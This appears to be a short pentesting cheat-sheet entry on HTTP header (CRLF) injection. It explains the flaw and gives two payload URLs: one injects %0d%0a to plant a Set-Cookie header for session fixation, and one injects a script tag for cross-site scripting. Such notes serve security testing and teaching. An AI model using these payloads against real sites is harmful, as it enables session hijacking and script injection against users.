HTTP Header Injection
Last modified: 2024-02-08
If the target site inserts user provided value into the response header without sanitizing, attacker may inject arbitrary key/value.
Exploit
By inserting \r\n (URL encoded: %0d%0a ), we may inject arbitrary header value in the response.
# Inject "\r\nSet-Cookie: sessionid=123456" into the response header
/?origin=example%0d%0aSet-Cookie:%20SESSID%3d123456
Exploit (XSS)
/?origin=example%0d%0a<html><script>alert(1)</script>